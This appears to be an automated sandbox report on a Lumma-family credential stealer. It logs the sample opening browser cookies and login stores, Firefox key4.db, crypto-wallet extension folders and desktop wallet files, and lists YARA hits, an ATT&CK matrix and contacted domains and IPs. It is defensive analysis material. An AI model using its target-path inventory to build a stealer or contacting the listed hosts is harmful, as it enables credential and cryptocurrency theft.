                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cnncmdhjacpkmjmkcafchppbnpnhdmon
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhad
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjih
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgef
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\cookies.sqlite
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhghoamapcdpbohphigoooaddinpkbai
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\afbcbjpbpfadlkmhmclhkeeodmamcflc
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\formhistory.sqlite
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cihmoadaighcejopammfbmddcmdekcje
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnba
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mnfifefkajgofkcjkemidiaecocnkjeh
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncg
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbch
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lgmpcpglpngdoalbgeoldeajfclnhafa
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\idnnbdplmphpflfnlkomgpfbpcgelopg
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lpfcbjknijpeeillifnkikgncikgfhdo
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aflkmfhebedbjioipglgcbcmnbpgliof
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fijngjgcjhjmmpcmkeiomlglpeiijkld
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\efbglgofoippbgcjepnhiblaibcnclgk
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimig
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onofpnbbkehpmmoabgpcpmigafmmnjh
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeblfdkhhhdcdjpifhhbdiojplfjncoa
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ejjladinnckdgjemekebdpeokbikhfci
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbch
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kpfopkelmapcoipemfendmdcghnegimn
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kncchdigobghenbbaddojjnnaogfppfj
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lkcjlnjfpbikmcmbachjpdbijejflpcm
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\091tobv5.default-release\key4.db
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nhnkbkgjikgcigadomkphalanndcapjk
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dmkamcknogkgcdfhhbddcghachkejeap
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ibnejdfjmmkpcnlpebklmnkoeoihofec
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jojhfeoedkpkglbfimdfabpdfjaoolaf
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ookjlbkiijinhpmnjffcofjonbfbgaoc
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblb
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmj
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aholpfdialjgjfhomihkjbmgjidlcdno
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data For Account
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dngmlblcodfobpdpecaadgfbcggfjfnm
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\klnaejjgbibmhlephnhpmaofohgkpgkd
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hdokiejnpimakedhajhdlcegeplioahd
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mmmjbcfofconkannjonfmjjajpllddbg
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hnfanknocfeofbddgcijnmhnfnkdnaad
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\egjidjbpglichdcondbcbdnbeeppgdph
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ffnbelfdoeiohenkjibnmadjiehjhajb
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aeachknmefphepccionboohckonoeemg
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hcflpincpppdclinealmandijcmnkbgn
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfo
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPRush
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPbox
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\Notezilla
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTP
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetter
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.wallet
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Ledger Live
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldb
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\wallets
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\wallets
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Binance
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDB
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\wallets
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\wallets
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDB
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\SUAVTZKNFL
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQ
                  Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQ
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeDirectory queried: C:\Users\user\Documents\EFOYFBOLXA
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQ
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeDirectory queried: C:\Users\user\Documents\EIVQSAOTAQ
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeDirectory queried: C:\Users\user\Documents\GIGIYTFFYT
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeDirectory queried: C:\Users\user\Documents\GRXZDKKVDB
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                  Source: C:\Users\user\AppData\Local\Temp\ExtractedLumma\lm.exeDirectory queried: C:\Users\user\Documents\PIVFAGEAAV
                  Source: Yara matchFile source: 00000026.00000003.2682127976.0000000003115000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000003.2731047551.000000000067D000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000003.2640497026.0000000003118000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000003.2671333888.0000000003115000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001F.00000003.2365862383.0000000002FD6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000003.2631693692.0000000003115000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000026.00000003.2729559730.0000000003121000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 4216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lm.exe PID: 7864, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Source: Yara matchFile source: Process Memory Space: IXDaI.exe PID: 7516, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: IXDaI.exe PID: 7708, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 27.0.B552.exe.7ff75ee70000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 27.2.B552.exe.7ff75ee70000.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000001B.00000000.2227933484.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000001B.00000002.2364799277.00007FF75F3B0000.00000002.00000001.01000000.0000000B.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: B552.exe PID: 4016, type: MEMORYSTR
                  Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\B552.exe, type: DROPPED
                  Source: Yara matchFile source: decrypted.memstr, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: BitLockerToGo.exe PID: 4216, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: lm.exe PID: 7864, type: MEMORYSTR
                  Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                  Source: Yara matchFile source: 00000004.00000002.1462544798.0000000000660000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.1780544287.0000000002131000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000010.00000002.1780411113.0000000000680000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.1462616334.0000000000681000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information112
                  Scripting
                  Valid Accounts431
                  Windows Management Instrumentation
                  112
                  Scripting
                  1
                  DLL Side-Loading
                  1
                  Disable or Modify Tools
                  2
                  OS Credential Dumping
                  11
                  System Time Discovery
                  1
                  Taint Shared Content
                  11
                  Archive Collected Data
                  1
                  Web Service
                  Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts12
                  Native API
                  1
                  DLL Side-Loading
                  1
                  Access Token Manipulation
                  11
                  Deobfuscate/Decode Files or Information
                  111
                  Input Capture
                  14
                  File and Directory Discovery
                  Remote Desktop Protocol41
                  Data from Local System
                  14
                  Ingress Tool Transfer
                  Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Exploitation for Client Execution
                  2
                  Scheduled Task/Job
                  812
                  Process Injection
                  241
                  Obfuscated Files or Information
                  Security Account Manager237
                  System Information Discovery
                  SMB/Windows Admin Shares1
                  Screen Capture
                  21
                  Encrypted Channel
                  Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Command and Scripting Interpreter
                  121
                  Registry Run Keys / Startup Folder
                  2
                  Scheduled Task/Job
                  22
                  Software Packing
                  NTDS1
                  Query Registry
                  Distributed Component Object Model111
                  Input Capture
                  11
                  Non-Standard Port
                  Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts2
                  Scheduled Task/Job
                  Network Logon Script121
                  Registry Run Keys / Startup Folder
                  1
                  DLL Side-Loading
                  LSA Secrets1161
                  Security Software Discovery
                  SSH2
                  Clipboard Data
                  4
                  Non-Application Layer Protocol
                  Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable Media4
                  PowerShell
                  RC ScriptsRC Scripts1
                  File Deletion
                  Cached Domain Credentials581
                  Virtualization/Sandbox Evasion
                  VNCGUI Input Capture125
                  Application Layer Protocol
                  Data Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items11
                  Masquerading
                  DCSync3
                  Process Discovery
                  Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job581
                  Virtualization/Sandbox Evasion
                  Proc Filesystem1
                  Application Window Discovery
                  Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                  Access Token Manipulation
                  /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron812
                  Process Injection
                  Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchd1
                  Hidden Files and Directories
                  Input CaptureSystem Network Connections DiscoverySoftware Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption
                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1480462 Sample: 7Y18r(14).exe Startdate: 24/07/2024 Architecture: WINDOWS Score: 100 105 rentry.co 2->105 107 mussangroup.com 2->107 109 8 other IPs or domains 2->109 131 Found malware configuration 2->131 133 Malicious sample detected (through community Yara rule) 2->133 135 Antivirus detection for URL or domain 2->135 139 27 other signatures 2->139 12 7Y18r(14).exe 1 2->12         started        16 ftejced 2->16         started        signatures3 137 Connects to a pastebin service (likely for C&C) 105->137 process4 file5 101 C:\Users\user\AppData\Local\Temp\IXDaI.exe, PE32 12->101 dropped 181 Detected unpacking (changes PE section rights) 12->181 183 Checks for kernel code integrity (NtQuerySystemInformation(CodeIntegrityInformation)) 12->183 185 Maps a DLL or memory area into another process 12->185 187 Switches to a custom stack to bypass stack traces 12->187 18 explorer.exe 122 21 12->18 injected 23 IXDaI.exe 14 12->23         started        189 Multi AV Scanner detection for dropped file 16->189 191 Checks if the current machine is a virtual machine (disk enumeration) 16->191 193 Creates a thread in another existing process (thread injection) 16->193 25 IXDaI.exe 16->25         started        signatures6 process7 dnsIp8 111 mussangroup.com 185.149.100.242, 443, 49737 VERIDYENVeridyenBilisimTeknolojileriSanayiveTicaretLi Turkey 18->111 113 gebeus.ru 189.165.133.52, 49717, 49718, 49719 UninetSAdeCVMX Mexico 18->113 117 8 other IPs or domains 18->117 79 C:\Users\user\AppData\Roaming\ftejced, PE32 18->79 dropped 81 C:\Users\user\AppData\Local\Temp\F6D9.exe, PE32+ 